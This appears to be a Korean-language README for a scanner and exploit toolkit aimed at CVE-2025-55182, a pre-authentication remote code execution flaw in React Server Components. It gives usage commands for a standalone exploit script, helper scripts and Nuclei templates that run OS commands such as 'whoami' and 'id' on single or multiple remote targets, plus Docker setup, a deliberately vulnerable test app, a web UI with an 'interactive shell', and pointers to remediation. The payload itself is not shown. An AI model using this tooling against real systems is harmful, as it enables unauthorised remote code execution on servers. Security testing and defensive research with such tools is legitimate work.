
CVE-2025-55182를 위한 스캐너 및 익스플로잇 툴킷으로, React Server Components의 중요한 사전 인증 RCE 취약점입니다. Nuclei 통합, Docker 배포, 웹 UI 및 취약점에 대한 포괄적인 교육 가이드를 특징으로 합니다.
CVE-2025-55182에 대한 포괄적인 보안 테스트 도구입니다. React Server Components의 심각한 사전 인증 원격 코드 실행 취약점입니다.
이 취약점을 100% 이해하고 싶으신가요?
📖 완전한 기술 분석 읽기 - 알아야 할 모든 것:
- React가 서버에서 실행되는 이유 (브라우저만이 아닙니다!)
- 시각적 다이어그램을 통한 공격 작동 방식
- 익스플로잇의 모든 라인 설명
- 초보자 개념부터 고급 익스플로잇까지
- 사전 요구 사항 없음!
적합한 대상: 보안 보고서, 교육 자료, 위협 분석, 또는 그냥 학습!
이 취약점은 React Server Components 버전 19.0.0부터 19.2.0까지에 영향을 미치며, 다음에 영향을 줍니다:
react-server-dom-parcelreact-server-dom-turbopackreact-server-dom-webpack영향: 인증되지 않은 공격자가 서버 함수 엔드포인트에 대한 HTTP 요청 페이로드의 안전하지 않은 역직렬화를 통해 원격으로 임의 코드를 실행할 수 있습니다.
👉 완전한 기술 분석 읽기 - 다음을 포함하는 포괄적인 가이드:
적합한 대상:
사전 지식 불필요 - 기초부터 시작하여 고급 익스플로잇 기술까지 다룹니다!
교육 및 승인된 보안 테스트 용도로만 사용하세요
이 도구는 다음 용도로만 사용됩니다:
경고: 컴퓨터 시스템에 대한 무단 접근은 불법입니다. 사용자는 모든 관련 법률 및 규정을 준수할 책임이 있습니다. 저자는 이 도구의 오용에 대해 책임을 지지 않습니다.
종속성 불필요! 빠른 테스트를 위한 단일 bash 스크립트.
👉 EXPLOIT_SCRIPT.md - 다음을 수행하는 독립 실행형 스크립트:
# Single target
./exploit-cve-2025-55182.sh http://target.com
# Multiple targets
./exploit-cve-2025-55182.sh -f targets.txt
Docker, 웹 UI 및 Nuclei 통합이 포함된 완전한 도구 키트입니다. 설치 방법은 아래를 계속 읽으세요.
설치 방법 선택:
# Clone repository
git clone https://github.com/StealthMoud/CVE-2025-55182-Scanner.git
cd CVE-2025-55182-Scanner
# Start scanner
docker compose up
# Access web interface at http://localhost:3001
# Clone repository
git clone https://github.com/StealthMoud/CVE-2025-55182-Scanner.git
cd CVE-2025-55182-Scanner
# Install Nuclei (macOS)
brew install nuclei
# Make scripts executable
chmod +x scripts/*.sh
📖 상세 설정: 단계별 지침은 SETUP_GUIDE.md를 참조하세요
⚡ 빠른 참조: 일반적인 사용 사례는 QUICKSTART.md를 참조하세요
웹 인터페이스 시작:
docker compose up
# Open browser: http://localhost:3001
취약 테스트 앱과 함께 시작:
docker compose --profile with-vulnerable-app up
# Scanner: http://localhost:3001
# Vulnerable app: http://localhost:3000
Docker 사용자 중요 사항: Docker에서 스캔할 때 다음을 사용하세요:
http://host.docker.internal:3000 호스트 머신의 앱을 스캔할 때http://vulnerable-app:3000 컨테이너화된 취약 앱을 스캔할 때https://example.com 외부 대상 스캔 시http://localhost:3001로 이동합니다.로컬 취약 앱을 생성하고 테스트합니다:
# Terminal 1: Start vulnerable app
./scripts/setup-vulnerable-app.sh
# App will run on http://localhost:3000
# Terminal 2: Test it
./scripts/test-local.sh
# Execute custom commands
./scripts/test-local.sh "whoami"
./scripts/test-local.sh "pwd"
./scripts/test-local.sh "ls -la"
# Basic scan
./scripts/test-remote.sh https://target.com
# With command execution
./scripts/test-remote.sh https://target.com "id"
# Create targets file
cat > targets.txt << EOF
https://target1.com
https://target2.com
https://target3.com
EOF
# Scan all targets
./scripts/test-multiple.sh targets.txt
기본 취약점 탐지:
nuclei -t templates/cve-2025-55182.yaml -u http://localhost:3000 -v
사용자 정의 명령어 실행:
nuclei -t templates/cve-2025-55182-interactive.yaml \
-u http://localhost:3000 \
-var cmd="whoami" \
-v
다중 대상 스캔:
nuclei -t templates/cve-2025-55182.yaml -l targets.txt -v
CVE-2025-55182-Scanner/
├── README.md # 주요 문서
├── EXPLOIT_SCRIPT.md # 독립 실행형 스크립트 가이드
├── QUICKSTART.md # 빠른 시작 가이드
├── SETUP_GUIDE.md # 상세 설정 지침
├── LICENSE # MIT 라이선스
│
├── exploit-cve-2025-55182.sh # 독립 실행형 익스플로잇 스크립트
│
├── Dockerfile # Docker 구성
├── docker-compose.yml # Docker Compose 설정
│
├── templates/ # Nuclei 템플릿
│ ├── cve-2025-55182.yaml # 탐지 템플릿
│ └── cve-2025-55182-interactive.yaml # 대화형 RCE 템플릿
│
├── scripts/ # 도우미 스크립트
│ ├── setup-vulnerable-app.sh # 로컬 취약 앱 설정
│ ├── test-local.sh # 로컬 인스턴스 테스트
│ ├── test-remote.sh # 원격 대상 테스트
│ └── test-multiple.sh # 다중 대상 테스트
│
├── web-ui/ # 웹 인터페이스
│ ├── server.js # Express 서버
│ ├── package.json # 종속성
│ └── public/
│ └── index.html # 프론트엔드
│
├── vulnerable-app/ # 취약 테스트 앱 (생성됨)
│ ├── Dockerfile # Docker 구성
│ └── ...
│
└── docs/ # 📚 문서
├── TECHNICAL.md # ⭐ 완전한 취약점 가이드
│ # - 작동 방식 (기초부터 고급까지)
│ # - 다이어그램을 통한 공격 흐름
│ # - 페이로드 분석 (모든 라인 설명)
│ # - 탐지 및 예방
│ # - 실제 사례
└── REMEDIATION.md # 수정 지침
docs/TECHNICAL.md ⭐ 가장 포괄적인 리소스
이 취약점은 React Server Components의 안전하지 않은 역직렬화에서 비롯됩니다. 공격자는 다음을 수행할 수 있습니다:
child_process 모듈에 대한 액세스 획득이것이 정확히 어떻게 작동하는지 이해하고 싶으신가요?
👉 Full Technical Breakdown - docs/TECHNICAL.md
이 포괄적인 가이드는 다음을 포함합니다:
✅ Why React Server Components run on the server (not browser)
✅ How prototype pollution works in JavaScript
✅ Step-by-step attack flow with visual diagrams
✅ Every byte of the exploit payload explained
✅ How attackers gain code execution from JSON
✅ Real-world proof of concept examples
✅ Detection methods and prevention strategies
평이한 언어로 작성됨 - 박사 학위 필요 없음! 'React 기초'부터 '완전한 익스플로잇'까지 한 문서에서 다룹니다.
적합한 대상:
취약한 버전을 실행 중인 경우:
전체 가이드: docs/REMEDIATION.md - 완전한 대응 단계
🎓 완전한 기술 분석 - 당사의 포괄적인 가이드
당사의 기술 가이드를 읽어야 하는 이유?
사용 대상: 전 세계의 보안 연구자, 개발자, 침투 테스터 및 교육자.
기여를 환영합니다! 기여하려면:
git checkout -b feature/improvement)git commit -am 'Add new feature')git push origin feature/improvement)이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하세요.
StealthMoud
이 도구가 유용하다면, 지원을 위해 ⭐ 별표를 눌러주세요!
Watch 이 저장소를 보고 업데이트와 새로운 기능을 확인하세요.
이 도구는 보안 전문가가 취약한 시스템을 식별하고 대응할 수 있도록 출시되었습니다. 항상:
✅ 테스트 전에 명시적인 서면 허가 획득 ✅ 발견 사항을 영향받는 당사자에게 책임감 있게 보고 ✅ 모든 관련 법률 및 규정 준수 ❌ 무단 액세스에 이 도구를 사용하지 마세요 ❌ 악의적인 목적으로 이 도구를 사용하지 마세요
기억하세요: 무단 컴퓨터 액세스는 범죄입니다. 책임감 있게 테스트하세요.
| Feature | Description |
|---|
| 🐳 Docker Support | Docker Compose를 사용한 원클릭 배포 |
| 🌐 Web Interface | 비기술 사용자를 위한 사용자 친화적인 웹 UI |
| 🔍 Vulnerable Test Environment | 안전한 테스트를 위한 로컬 취약 앱 실행 |
| 🎯 Remote Scanning | 외부 대상의 취약점 테스트 |
| ⚡ Interactive Shell | OS 명령어 실행 및 실시간 결과 확인 |
| 📊 Multiple Scan Modes | 탐지만 또는 전체 익스플로잇 |
| 📝 Detailed Reporting | JSON 및 텍스트 출력 형식 |
| 🔧 Nuclei Integration | ProjectDiscovery의 강력한 스캐너 활용 |